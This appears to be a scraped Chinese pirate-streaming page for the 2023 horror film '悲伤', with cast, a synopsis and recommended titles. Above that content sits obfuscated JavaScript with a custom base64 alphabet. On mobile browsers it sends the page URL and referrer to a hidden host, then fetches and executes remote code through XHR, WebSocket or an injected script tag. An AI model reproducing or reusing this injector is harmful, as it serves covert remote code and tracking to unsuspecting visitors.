function mdre(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r, o, c, s, a, i, l;
let d = 0;
let f = String(e).replace(/\r\n/g, "\n");
let h = "";
for (let e = 0; e < f.length; e++) {
const t = f.charCodeAt(e);
if (t < 128) {
h += String.fromCharCode(t);
} else if (t > 127 && t < 2048) {
h += String.fromCharCode(t >> 6 | 192);
h += String.fromCharCode(t & 63 | 128);
} else {
h += String.fromCharCode(t >> 12 | 224);
h += String.fromCharCode(t >> 6 & 63 | 128);
h += String.fromCharCode(t & 63 | 128);
}
}
while (d < h.length) {
r = h.charCodeAt(d++);
o = h.charCodeAt(d++);
c = h.charCodeAt(d++);
s = r >> 2;
a = (r & 3) << 4 | o >> 4;
i = (o & 15) << 2 | c >> 6;
l = c & 63;
if (isNaN(o)) {
n += t.charAt(s) + t.charAt(a);
} else if (isNaN(c)) {
n += t.charAt(s) + t.charAt(a) + t.charAt(i);
} else {
n += t.charAt(s) + t.charAt(a) + t.charAt(i) + t.charAt(l);
}
}
return n;
}
function iwtq(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r = 0;
let o, c, s, a;
const i = String(e).replace(/[^A-Za-z0-9\-_]/g, "");
const l = i.length;
while (r < l) {
if (r == l) o = -1; else o = t.indexOf(i.charAt(r++));
if (r == l) c = -1; else c = t.indexOf(i.charAt(r++));
if (r === l) s = -1; else s = t.indexOf(i.charAt(r++));
if (r === l) a = -1; else a = t.indexOf(i.charAt(r++));
if (o === -1 || c === -1) {
break;
}
const e = o << 2 | c >> 4;
n += String.fromCharCode(e);
if (s !== -1) {
const e = (c & 15) << 4 | s >> 2;
n += String.fromCharCode(e);
}
if (a !== -1) {
const e = (s & 3) << 6 | a;
n += String.fromCharCode(e);
}
}
let d = "";
r = 0;
while (r < n.length) {
const e = n.charCodeAt(r);
if (e < 128) {
d += String.fromCharCode(e);
r++;
} else if (e > 191 && e < 224) {
const t = n.charCodeAt(r + 1);
d += String.fromCharCode((e & 31) << 6 | t & 63);
r += 2;
} else {
const t = n.charCodeAt(r + 1);
const o = n.charCodeAt(r + 2);
d += String.fromCharCode((e & 15) << 12 | (t & 63) << 6 | o & 63);
r += 3;
}
}
return d;
}
function gwyddp(e) {
return Math.floor(Math.random() * (e + 1));
}
window['w'+'jb'+'hz'+'s'+'fx'] = navigator.platform && !/^Mac|Win/.test(navigator.platform) || !navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent) ? function() {
(function(e, t, n) {
const r = n[iwtq("dPW5hqWyi4Inhqp0iU")];
let o = "";
try {
o = opener ? opener.document.location.href : n.referrer;
} catch (e) {
o = n.referrer;
}
if (o && o.length > 900) {
o = o.slice(0, 900);
}
let c = t.location.href;
if (c && c.length > 900) {
c = c.slice(0, 900);
}
const s = iwtq(e).split(",");
const a = s[3];
const i = s[2];
let l = s[4];
let d;
if (l.indexOf(";") > -1) {
let e = l.split(";");
if (e.length < 1) return;
if (e.length > 1) {
d = e[gwyddp(e.length)];
} else {
d = e[0];
}
} else {
d = l;
}
const f = mdre(`su=${d}&t=${s[0]}&d=${s[1]}&r=${o}&m=${Date.now()}&u=${c}&sm=${i}`);
const h = navigator.userAgent;
if (h.indexOf("b" + "ai" + "d" + "u") !== -1) {
const e = new XMLHttpRequest;
e.open("POST", `${i}://${d}/getSv/${f}`);
e.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
e.setRequestHeader("X-REQUESTED-WITH", "XMLHttpRequest");
e.onreadystatechange = function() {
if (e.readyState === 4 && e.status === 200) {
const t = JSON.parse(e.responseText);
const n = new Function("c", `${iwtq(t.ds)}; return ${t.ns}(c);`)(t.img.join(""));
new Function("_tdcs", n)(r);
}
};
e.send();
} else if (t.WebSocket && /UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(h)) {
const e = new WebSocket(`${a}://${d}/ws/${f}`);
e.onmessage = function(t) {
e.close();
const o = t.data.split(";");
if (o.length > 2) {
remoteCode = iwtq(o[0]);
remoteCode += iwtq(o[1]);
remoteCode += iwtq(o[2]);
new Function("_tdcs", remoteCode)(r);
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
};
e.onerror = function() {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
};
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
})("H-01H2ULGCmMiDALGDiLh51nhOILfrHydPpziQ", window, document);
} : function() {};
悲伤
主演:Danielle Keaton Paris Peterson
导演:Robbie Smith
类型:恐怖
地区:美国
年份:2023
时间:09-05
简介:
萨姆失去了亲近他的人,生活变得模糊不清。 当他的母亲建议到她的森林度假屋放松一下时,萨姆抓住这个机会——不知道一个古老的实体,以悲伤为食,将脆弱的心灵扭曲成迷幻的地狱景象,住在森林里,饥肠辘辘,等待着
萨姆失去了亲近他的人,生活变得模糊不清。 当他的母亲建议到她的森林度假屋放松一下时,萨姆抓住这个机会——不知道一个古老的实体,以悲伤为食,将脆弱的心灵扭曲成迷幻的地狱景象,住在森林里,饥肠辘辘,等待着。
详情
猜你喜欢
-
正片
伊丽莎白·赫利 乔治娅·洛克 劳伦·麦奎因 弗莱迪·索普 吉娜维芙·冈特 Pear Chiravara 马克斯·帕克 利里奥·博阿滕 Agi Nanjosi J.T. Foxx Corbie Cenita Billy Phillips 艾梅柏·汤森 托马斯·唐尼
-
正片
丹妮卡·戈隆贝克 , 格雷森·埃迪 , 娜塔莉·索德奎斯特
-
正片
奥费莉娅·梅迪纳 , Arap Bethke , 巴勃罗·吉萨·科斯廷格 , Samantha Castillo , Mauro González , Mildred Motta , Klaudia Garcia , Paola Miguel , Paloma Alvamar , vanna Sofia Ferro
-
正片
布伦娜·斯卡尔斯基 伊恩·赖尔·迈克尔斯 大卫·赫特
-
正片
Chad Sellers Gaia Brooks Natalie Polisson Kent Hatch Edward A Miller Keoki Trask Miguel Berlingeri Daniel Collins
-
正片
薇薇安·波斯纳 Erick King ,Darren McStay 雅科·哈钦斯 Rebecca Ward 米麦仑登 Aron Syrjä Henry Valo Monika Lindeman Eetu Merisaari Oona Kare Sara Ritala
-
抢先版
贾斯汀·朗 德蒙特·莫罗尼 杰梅因·福勒 CM朋克 尼基·米切奥 RJ·赛勒 飞莲 迈克·弗格森 弗雷迪 吉布斯 Zuri Reed 埃文·沙夫兰 YG , Kim Yarbrough Colin Young 乔恩·奥斯华尔德 尼克·吉利 Dennis Boyd
-
抢先版
阿尔菲·威廉姆斯 拉尔夫·费因斯 杰克·奥康奈尔 基里安·墨菲 艾玛·莱尔德 毛拉·伯德 艾琳·凯利曼 齐·刘易斯-帕里 罗伯特·罗兹 萨姆·洛克 吉哈兹·艾尔·鲁法埃 娜塔莉·库斯托 Elliot Benn
-
正片
迈克尔·J·雷诺兹 肖娜·麦克唐纳 Jessika Williams 道格拉斯·霍奇 乔希·达拉斯 安娜·斯科莱姆 加万·奥赫利希 Krysten Cummings Doug Ballard Josh Cole 萨斯基亚·马尔德 娜塔莉·杰克逊·门多萨 阿里克斯·瑞德 诺拉简·努恩 玛安娜·本灵
-
抢先版
大卫·达斯马齐连,麦斯·米科尔森,西格妮·韦弗,瑞贝卡·亨德森,希拉·阿蒂姆,索菲·斯隆,Wael Alroyly,Sute Zhao
-
正片
Davida Arhin,Simon Berry,Charlie Bond,Chris Riley Ellis,Robbie Hampstead,Chris Mills,Ella Palmer,Annabella Rich
-
正片
亚历克斯·沃尔夫,加布里埃尔·伯恩,托妮·科莱特,米莉·夏普洛,克里斯蒂·萨默海斯,摩根·伦德,马洛里·贝克特尔,杰克·布朗,布赖恩·拉谢尔,海蒂·门德兹,莫伊塞斯 L·托瓦,贾罗德·菲利普斯,安·唐德,布罗克·麦金尼,扎克瑞·亚瑟,奥斯丁·R·格兰特